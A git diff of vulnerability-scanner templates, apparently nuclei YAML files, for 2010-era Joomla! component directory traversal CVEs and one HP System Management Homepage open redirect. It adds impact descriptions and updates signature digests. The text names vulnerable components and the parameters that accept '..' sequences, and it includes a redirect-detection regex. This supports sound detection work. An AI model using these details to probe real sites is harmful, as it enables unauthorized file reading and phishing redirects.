author: daffainfo severity: medium description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12171 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d8b5aff97935929d851f2dd64b4d5f439dbb135651412c45bda3b4d3cecfa09d022100b691dfb257d7493f6f77958108d5ff0293326faf008105be0505feccb6dd50b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e2f5d6ac3b345ee3cfa7384339109d6498d73396a041237ba62f85526c5755b022100a131f30562e84b03ddfb91b97024de09c91c88583778ffeeeb1feb0787c279c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index 466d0d3096..a14291eb9c 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component Sweetykeeper or apply the necessary patches to fix the LFI vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204dfe9e502a57e3e916593caf6ae1ab12d5cfe1a70bee11c5af267d6697516c9a02201c43a3e7c17e20f7e27061439acf0f3149516160d37295a7b5c0a3fccea39819:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203fac14474eded012145b6cc5d2952b23724d33d7a6533cb251a4ff33a6a7403e022046a06cd61e75005c10d20e74a8989cb3b5b7b7279333ef5743ec00241aa04eef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index c92a9af787..ff03ca3d3b 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + The LFI vulnerability can allow an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code. remediation: | Update to the latest version of Joomla! Component Preventive And Reservation and apply any available patches or fixes to mitigate the LFI vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220347d65e25b5cbb302e9d5c17cd657658391d5a8a0a9af81cedbcba316b32f27c02204a31659e2975ec31b519c73c1528294a159f14bcacbe2d810dfd611310873822:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205121f2e892c037b7ac973a0080003faa18a9c705a9a025279a23a5942b4a362902204df0392cc98a96774f98772e99e110f26e6e3a2afc572f453bffd4305d0d6e90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 52de1efe20..814bae2adc 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12150 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a2269cd1a53c24c6af0a68b496ff1b58b824e0d9255746297ae1f3504c06c090022013fd2262d9d0190dbfb2d6ccd01eb44c559b7f073d64df1c96f40717e864d8e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d5417a03479c8004cc8a34cbb7abdbe70cdd7a851a528792d72560c471d52e8e022013f0d023748d6b1e1c3bf7582cc10d8f230a60aa0f03d58a4cb5ace89cccbc52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 7505906626..0aff8845de 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12145 @@ -37,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022071fef327ece73af4e957ebdacb2f283ddcf0666206beeb7d6e7675bff6a4a680022100b2eb72abc7691d8444931c4c42bdda1bfb8cfcf31a3d52d5dc9e360e39f8e311:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008141ca5c007f7e8cef45d147c64118c92755dbe18bad5efacb93ba4bee5f784102205acdbd62f9d1e6b512ddc3f4ce80f249330376fad2ddac92fd2968cbf1090103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 077829d7d2..7ee62cea87 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12318 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210099c131a4be3b851face18f6292bd13bac9b76ebf6a9575080d389fba020855fa0221009d80872f5b43b6ac579ed968ef752215290aa43a8fdb5febb7d322d300ee2cec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d829381add883dd1d5af538546bab9cfd00e470a806b5543ae8731c1621a8395022100f8dc253e35b6cc1342ee3b3a5e3f8292439de7542ef702b51140cc83fcf147df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 21dc944764..c8ed5a3eba 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12113 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d3eaa3e347e6a2d8632599d435f90a88248f4c5f70d0bbce63138bf06521ec98022064c5ce2112150b47e8ed672aeb937f6a4a7518a2ea6eb7e8aa6f24a41f936c52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009ba34cfc30e2696d2f60567dfda7a22293776c64a3fec9689f2b5d44e69b7da5022055c4c0938d9a9cee5e650c746792770cdfe8bdbb9584093dc0247acb1cafa355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 2d04ebc424..94e5906378 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12286 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c10fbc9874082966906af3524ab31606fcf801ea2cfb768869dc213399ed866d022058fedfcd23f360fac72d00c1d9eb14e3028d75300c60dc34eda86e57744ade68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204bc942e036cac7325edc601114a5bed76a616e7848e29f355f99aaa6b41d2526022100d8473b1793386d25bc4d72b6be8233568b651c311b9c109a28847ed26c4c8b77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index 2e44a95919..fbed245fbe 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12054 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220338df5544487b4a6fea12da607569bc1708ce8c61e722fb0696bd277f79f7257022018696a318d9442606410bfebb671c036c2531863bf271e432b43826e6133ca27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204de369cdcd5642bfba5117d8bd6d580d376907887b0db877e5010bf9b7af696d022100fc299cf2a0b7049e80bc3b6c69471724da1be4f2f738b50df7815291c0cddb3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 14913ecc9f..bbfb68b5b6 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12118 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c53613a3cef1c1353f982e3b54f717214b9f9be8267b9c33425391a494b15be402205d5d020b8b17c4345d34548574513a9c92152595795128aa23ee3bc0a155de9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d219bfb3f6cbf16b9e8fc5c98b899808a4e51dd967f238011fb2e021fdefe55c022100e6c92c27a313dfb2117711d107cfad86965ec2e46b2f68abcbf96a58ce448d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index 2a8553275f..48855c5b76 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12142 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022068e2ec4b051f1fee79347d7820d0374c3e65526b9cdbdb42e28feeb1d6583c4c022100eb51ea517e54a8da87b3b2cc145192a026d887a530c031f7ec7a4a9e4fb97ef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e6531faa16beb682aa96eb4b61b502041d816dd7bb5d4e27ff102cc19c33553f022100bc65f33d23e213b2505cbe37ad46be4dfdd435ac7e764407cebe193a08f4c271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index ebb17a1f22..34368ce661 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component TRAVELbook or apply the necessary patches to fix the LFI vulnerability. reference: @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b89546a3f4377ba956987cf591456cee6237129ca51ff5c62849be0868c1dae302205bd70312a251c90f0107558ca2664b3af4ed7ec2c5896f7e32cbd263ffb087dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a1ca762268be18b1225d800ffa6847afa432024b0724f1e85f24f18b2ec1ce3022100c5bfbeeb89ead13f3b2b34b0557f86727df26bf3f33464c6d7fdfd28bc78d612:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 17edebb83c..4b8bb4fcc0 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: | Apply the latest security patches or updates provided by Joomla! to fix the directory traversal vulnerability in com_blog component. reference: @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a71de48e476071ed5a83fba8a0f1bf2f987513816aa280177504a878bee962e602205f41d0579c41e5643d6410013081f30a0c5c35006b9d4b6f5734381a635feb56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a9a56652a6b615e6dd15e8aaee28b3bc822f7a818542029ef8ba83c2df7ea1702204c46b96e486e65d2ab0bc8669738b56d4226444fb04cecc26803e7d17489c080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index 32f4e6f63e..77b3cf12dc 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware. remediation: | Apply the latest patches or updates provided by HP to fix the open redirect vulnerability. reference: @@ -36,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a004630440220096ee755e28cfd4b0b033c34ef6523da4772378fab56cb37f7968e0547e43f8b0220601f13af2d58faa914ab66670384d1dc19446e5dff304827d045f4a7c5f393c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022036ec89a20bfbd44d98ab6a1a972b575521992faef4f4fcded33a447ae95f003d022100a4a2c52f0bb6af88942a06e56af358752329728b51ceff63c8f00fbdbdd900a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 724aa4a847..b816c6afbb 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage. remediation: | Apply the latest security patches or upgrade to a patched version of Joomla! Component JA Comment to mitigate the LFI vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202f8bed8ea5e690594ee1ad6e799e3bbd5cd55c73d459987d3454df7eda28cd63022100d98eadf0eec286baa287de1b3656090d60213830c083a98d0e4782d18f2d3a83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206edac5876107d5f82bf5701673a37f3855b77a2c31a6b6e7a1da22af90f3766c02200cafb34ac24bd0d1367f64014bc6727b58a6f2468d783e4c6c81a064475b7390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 6c88629fa2..58616861ae 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component ZiMB Comment or apply the provided patch to fix the LFI vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f478e39b58afbb9fa6409bf223c04f8d623d7eb70fd32595e8c3f26b0536aaae0220130513e188e10dcb39aa7387f309129fee2d824a97afc8d5468461613bd36d00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220290dd86db1faa992098c4b0f73c7654644b03eae53f450b35197edbf4e50fce4022100cbb7f50a7c405a13407ff912e856d09735e30d47ee3817ea21f93f440ee0b250:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 498352f342..35dedf0ded 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12284 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203cf2eeccc078d88371100d37399663d39e29c9c42fd3a3c8015919d7b5693e08022100ee99dfdf9159565c59f59ec55511836ade02e0fbd95430969b12c031e9d6567a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207aecc61f14dc32fb3d52d57a02f65e6ca7fe1248d479866cc2f270ad70d2e8350220192b03370d673feadc5f0f056dbe32af6752750a5b3a6189824b373ee9942481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index bda12284af..9c08e97b52 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Update Joomla! Component WMI to the latest version or apply the provided patch to fix the LFI vulnerability. reference: @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202097e8ae97446ecd72d7d9e8503dd648487fe87303f6159756c65d151718d5c5022055a6373d734b67cc3b8effcd0197251720d23cf7779100c578e06c8027eb94fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c37f564e45b1a095557537556e6fc5529db3861979d9f8cc7871bf45b972789602201f14d3c585153158d6d1513c809426cdc5bf4b8cd4e579b2528bad36d980eeaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 2d178fdecb..58c66e492b 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the entire Joomla! installation. remediation: | Update Joomla! Component Graphics to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220785f703fa2e90058c8205c34879eee0b28e0f340d75d4b8b6e94c78c441113db02207d30d9982d3a1cc338c5985ca9853ee23ad6aeba48b55a5dff969003346b83e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029242a7077a7b45969c4a0a50616a234fa8121b3ec50fbccf8898c87125a79c202203b5db4964669217bd6cb0595d2e58027e8dc4e1cbf3ad44f9c3c75c38876fb01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index f0b4ef9ce2..fc0062f4ee 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component SmartSite or apply the necessary patches to fix the LFI vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201058e656f143389fb2390812be886b40c04539f44b3c994fc5cb9a19288ec5f402204c25fdd80681b2162aa5d47d090f9dd8c668c5fa823d1a82600068a255f82362:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206b45fb3e22374f56b528d0224831a712aaa3d82734c27f64bbb830b3aae3e4270220045de48c4ef548d03f4c030408a96d3185aa9c4cc71155f433ec2297e75b8551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index 08db918e6d..1df114c744 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can allow an attacker to read arbitrary files on the server, potentially leading to unauthorized access, sensitive information disclosure, or further attacks. remediation: | Update to the latest version of Joomla! Component NoticeBoard or apply the necessary patches to fix the LFI vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f3ae9fa23d2b965d99b9af2fa3e774533a6826983faeb9fe2da9f29dc8cc3c8a02205943c1cd68eb5c929f337a5bea9c49c8a512a5aec8575d2e97c4239586c58ca9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a67780f4ffb8421b4913c9bb7356d2085f6d8010c2f57544b503e3267b1a5f2b02207f4253e96686e926c8d0c5570f0a1cd5935383902fbdde47cf9482ebe68a6ad7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 680159226f..92ade001f1 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: | Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in Ultimate Portfolio 1.0 component. reference: @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bbcd4f5ca339848a9c25c7221083dc46b003a2599fcfaedc6aa827174686650c022100a3a3fd55af036a15c13cbc7d6185b4805ea628f9a415f2b1fc601c3d878ebfc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eab4d7279b5c617e1dc60ed807028331e0a3a20f663fcaa96d5ecace5d023deb022046c25e560476c8b53806bea5ef61a2792625e87d30bf4cc411462aaaa51f70ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index 2c236eee6e..b7b8c9a375 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Apply the latest patch or upgrade to a newer version of the Joomla! Component iF surfALERT to mitigate the LFI vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d66bb2526cd6fd21a6ae7c7c7c36e79f6449673ab0633d5299e5d639c213074d022100a079157860f11d0e7c4522bc6ee64b110b4b39ab57c3c2c46a99e9c38e947d64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024c6cad07f9234d03bda1b47bcff7b62648b645d181fe28d2cfdf9cd1372e1be022100ca59cc8f108f456637034771d6dfe518d39d33e8539d607a963ba328f8acf6a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 59f5052bed..0851ce5cd1 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Apply the latest security patches or updates provided by the Joomla! Component MT Fire Eagle 1.2 vendor. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022020138b379909d2b98b55d8d5e6f1b588f9063645935e13c38038b6166529a9fb022100eee3b2517664caaca450438d2d1ec91248967baa6702fa74cecde689a71bab82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220142f9dcdd56f429cd511e16b35108914b7eafc2b970541a565bf5a517e3c9e840220363d23a03fae02e91d4ef98823a6c443cb14d0a6d9efac30106888db03c09d13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index ddd42c1da4..333a2aa3a5 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -5,6 +5,8 @@ 